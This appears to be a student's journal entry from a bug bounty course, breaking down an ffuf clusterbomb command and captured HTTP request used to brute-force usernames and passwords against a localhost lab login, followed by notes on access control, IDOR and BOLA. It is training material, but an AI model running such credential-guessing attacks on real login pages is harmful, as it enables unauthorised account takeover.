Journal
Last night when doing the first challenge problem for the PJWT certification course Practical Bug Bounty I got very close to solving it, but no dice. the methods I used were right but I did not get the solution due to the password list I used and not looking more at the changes is size of response. I tried using Burp but the limits community had was a bit painful for my taste and I wanted to go big. I wanted to see if I could get multiple creds by using the biggest username list and the top 4 passwords. Because I could not justify spending $500 on Burp Suite right now I went with Fuff.
Fuff command from last night
ffuf -request tmp.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Passwords/pass5.txt:FUZZPASSWORD -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSERNAME -fs 3256lets break down the top request into chunks to better retain and understand what it does
Using a premade request
ffuf -request tmp.txtThe above is stating that we want to use a request that is defined in our tmp.txt file. An example of out tmp.txt file is below.
POST /labs/a0x03.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://localhost
Connection: close
Referer: http://localhost/labs/a0x03.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=FUZZUSERNAME&password=FUZZPASSWORD
I got the above file by using burp suit to proxy the request first
Request Protocol
ffuf -request tmp.txt -request-proto httpthe addition in the above statement is telling us to use the http protocol when running.
Mode
ffuf -request tmp.txt -request-proto http -mode clusterbombThe addition of ā-mode clusterbombā is letting us choose to run every password with every username. There are four modes as I am currently aware of but right now let us just focus on Cluster Bomb since that was the one used.
āCluster Bomb lets us use multiple payload sets. There is a different payload set for each defined position. The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested.ā
- Burp suite
Essentially with our request it is letting us go through each username and password combination to see if we get a pop.
Variables
ffuf -request tmp.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Passwords/pass5.txt:FUZZPASSWORD -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSERNAMEWith the addition of the ā-wā tag we are telling Fuff that we want to use the wordlist in the path. the addition of ā:FUZZPASSWORDā and ā:FUZZUSERNAMEā are telling Fuff that we want to use FUZZPASSWORD and FUZZUSERNAME as the variables inside of tmp.txt and we want them to be the variables to the lists that they are attached too by the colon hehe
Filter
ffuf -request tmp.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Passwords/pass5.txt:FUZZPASSWORD -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSERNAME -fs 3256Now that we are back to our full command that ends with ā-fs 3256ā the ā-fsā just stands for filter size and we are filtering by a common return size of 3256 to see what returns have a different size.
LISTEN When I was doing the demo I tried filtering by other methods then return size and got no results. I think this is what tripped me up. Just sort by size
Raw Notes
- Todays learning started with Intro to Authorization from Practical Bug Bounty
- There are a few access controls we should be aware of
- Vertical access control
- Restricts certain functionality to certain user
- customer on an ecommerce site restricted from Admin privileges
- Restricts certain functionality to certain user
- Horizontal Controls
- Restricts access to resources for a user
- Can update their own account but not another user
- Restricts access to resources for a user
- Context Dependent
- Allows or restricts users based on a current state
- Such as checking out without a credit card
- Allows or restricts users based on a current state
- IDOR
- Insecure Direct Object Reference
- Common in API driven applications
- Broken Object Level Authorization (BOLA)
- When working with APIās essentially the same thing
- When doing Bug Bounties
- It is recommended to create two user accounts
- Whenever you access user a try to substitute using user bās id or username.
- The reason you do this is to make sure you donāt affect real users or see their information
- It is recommended to create two user accounts
- API
- Play around with API just to remember APIās more
- Vertical access control
Fuff Commands Bug Bounty PJWT #blog Deep Dive into Fuff #blog The 4 modes of brute forcing